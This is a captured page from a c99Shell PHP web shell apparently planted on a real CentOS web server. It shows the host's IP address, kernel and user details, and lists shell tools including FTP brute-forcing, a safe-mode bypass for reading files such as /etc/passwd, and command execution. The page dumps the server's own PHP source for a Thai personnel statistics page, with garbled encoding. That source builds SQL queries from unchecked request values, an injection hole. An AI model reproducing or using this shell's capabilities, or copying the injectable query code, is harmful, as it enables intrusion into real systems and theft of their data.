110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x Free 52.98 GB of 127.8 GB (41.45%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php



    /**  Define Validate Access  */

    define( '_VALID_ACCESS', 1 );

    

    /**  Configuration  */

    include( "configuration.php" );

    require_once( $_Config_absolute_path . "/includes/framework.php" );

    require_once( "include/Function.php" );

    require_once( "includes/FunctionDB.php" );

    /**  Create Database Object  */

    $dbObj = new DBConn;



/**  Chart  */

    include ("./includes/charts.php");

            

    /**  Config Table for This Page  */

    $myTable = "faculty_tb";

    $myTableFK = "Faculty_code";

    

    $myTable1 = "personal_tb";

    /**  Paging */

    $page = $_GET['page'];

    if( $page == "" ) { $page = 1; }

        

    /**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */

    $perpage = $_REQUEST['perpage'];

    if( $perpage == "" ) { $perpage = 20; }



    $param = "";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />

<title><?=$_Config_sitename;?> - ўйНБЩЕЅиТВЗФЄТЎТГ - ГТВЄЧиНАТ¤/ЅиТВ</title>

<script type="text/javascript" src="./js/utilities.js"></script>

<script language="Javascript" src="./charts/charts.js"></script>

<link href="./css/default.css" rel="stylesheet" type="text/css" />

</head>



<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">

<?php

    include( "./templates/incHeader.php" );

?>

<table width="1003" border="0" cellspacing="0" cellpadding="0">

  <tr>

    <td width="215" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include( "templates/incMainMenuLeft.php" );?></td>

    <td width="788" height="300" align="center" valign="top" style="padding:10px 0px 5px 10px">

    <?php

        /**  Config Paging  */

        if( $perpage == "" ) { $limit = $_Config_limit; }

        else { $limit = $perpage; }

        

        $scroll = $_Config_scroll; 

        

        /**  µСй§¤иТ Default КУЛГСєЎТГ·У Order By  */

        if( $OrderBy == "" ) { $OrderBy = $myTableFK; }

                        

        if( !isset($_GET['ASCDESC']) ) { $ASCDESC = "ASC"; }

                        

        if( $_GET['ASCDESC'] == "ASC" ) { $ASCDESC = "DESC"; } 

        elseif( $_GET['ASCDESC'] == "DESC" ) { $ASCDESC = "ASC"; }

        

        /**  Query аѕЧиНЛТ Numrows ЎиН№  */

        $query = " SELECT *  FROM $myTable  WHERE  FacultyStatus ='Y'  ";

        $result = $dbObj->execQuery($query);

        $numrows = $dbObj->_numrows;

        

        /**  Paging  */

        $display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];

        $start = ( ($display * $limit) - $limit );

        /**  Paging  */

        

        if( isset($_GET['OrderBy']) ) {

            $query = " SELECT *  FROM $myTable  WHERE  FacultyStatus ='Y' ORDER BY  $OrderBy  $ASCDESC ";

        } 

        elseif( !isset($_GET['OrderBy']) ) {

            $query = " SELECT *  FROM $myTable   WHERE  FacultyStatus ='Y' ORDER BY  $myTableFK  ASC ";

        }

        

        $query .= " LIMIT $start, $limit ";

        $result = $dbObj->execQuery($query);

    ?>

    <fieldset><table width="770" border="0" cellspacing="0" cellpadding="0">

     <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?page=<?=$page;?>&amp;<?=$param;?>">

      <tr>

        <td height="5"></td>

      </tr>

      <tr>

        <td height="30" background="images/background/bg-head-topic-w780.gif"><span class="PADDING-LEFT-10"><strong><a href="index.php">Л№йТЛЕСЎ</a> &raquo; <a href="Menu_Personal.php">ўйНБЩЕєШ¤ЕТЎГ</a> &raquo; <span class="NOTE">ЁУ№З№єШ¤ЕТЎГЁУб№ЎµТБ»ГРаА·єШ¤ЕТЎГ</span></strong></span></td>

        </tr>

      <tr>

        <td>&nbsp;</td>

      </tr>

      <tr>

        <td><span class="PADDING-TOP-10"><img src="images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ВйН№ЎЕСє</strong></a></span></td>

      </tr>

      <tr>

        <td>&nbsp;</td>

      </tr>

      <tr>

        <td align="center" valign="top"><?php if( $numrows > 0 ) { ?>

          <table width="663" border="0" align="center" cellpadding="0" cellspacing="0" class="BORDER-GREY">

            <tr bgcolor="#F8F8F8">

            <td width="26" height="23" align="center">No</td>

            <td width="402" align="center"class="BORDER-LEFT PADDING-RIGHT-15">ЁУ№З№єШ¤ЕТЎГµТБЛ№иЗВ§Т№</td>

            <td width="50" align="center" class="BORDER-LEFT PADDING-RIGHT-15">ЄТВ</td>

            <td width="50" align="center" class="BORDER-LEFT RIGHT PADDING-RIGHT-15">ЛФ§</td>

            <td width="104" align="center" class="BORDER-LEFT RIGHT PADDING-RIGHT-15">ЁУ№З№<br />єШ¤ЕТЎГ·Сй§ЛБґ</td>

          </tr>

          <?php 

           $no = 1+($display-1)*$limit;

            while( $rs = $dbObj->fetchArray($result) ) { 

                $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";

                

                $Faculty_code = $rs['Faculty_code'];

          ?>

          <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">

            <td height="23" align="center" class="BORDER-TOP-RIGHT"><?=$no;?></td>

            <td align="left" class="PADDING-LEFT-5 BORDER-TOP"><?php echo $rs['Faculty_name']; ?></a></td>

            <td align="center" class="BORDER-TOP BORDER-LEFT-RIGHT PADDING-RIGHT-15">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE   Faculty_code='$rs[Faculty_code]'  AND  statusId='1'  AND  Sex ='ЄТВ' ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </a></td>

            <td align="center" class="BORDER-TOP BORDER-RIGHT PADDING-RIGHT-15">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE  Faculty_code='$rs[Faculty_code]'  AND  statusId='1'  AND  Sex ='ЛФ§' ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </a><a href="StudentProvinceList.php?studentStatus=1&amp;homeProvinceId=<?=$rs["homeProvinceId"];?>&amp;studentSex=F"></a></td>

            <td align="center"  class="PADDING BORDER-TOP">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE  Faculty_code='$rs[Faculty_code]'  AND  statusId='1' ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </span></td>

            <?php 

               $no++;

            } # while 

          ?>

          </tr>

          <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">

            <td height="23" colspan="2" align="center" class="BORDER-TOP"><strong>ГЗБ</strong></td>

            <td align="center" class="BORDER-TOP BORDER-LEFT-RIGHT PADDING-RIGHT-15">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE    statusId='1'  AND  Sex ='ЄТВ' ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </span></td>

            <td align="center" class="BORDER-TOP BORDER-RIGHT PADDING-RIGHT-15">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE     statusId='1'  AND  Sex ='ЛФ§' ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </td>

            <td align="center"  class="BORDER-TOP BORDER-RIGHT ">

              <?php

                  $sql1 = " SELECT *  FROM  $myTable1   WHERE   statusId='1'  ";

                  $result1 = $dbObj->execQuery($sql1);

                  $countnum1 = $dbObj->_numrows;

                  $dbObj->freeresult($result1);

                      echo $countnum1;

                ?>

            </td>

          </tr>

        </table>

        <?php } #if ?></td>

      </tr>

      <tr>

        <td>&nbsp;</td>

      </tr>

      <tr>

        <td><table width="750" border="0" cellspacing="0" cellpadding="0">

          <tr>

            <td align="center"></td>

          </tr>

        </table></td>

      </tr></form>

    </table>

    </fieldset></td>

  </tr>

</table>

<?php include( "./templates/incFooter.php" ); ?>

</body>

</html>

<?php

    /**  Free Resource */

    $dbObj->freeresult($result);



    /**  Close the Database  */

    $dbObj->disconn();

    

    /**  Unset Class  */

    unset($dbObj);

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: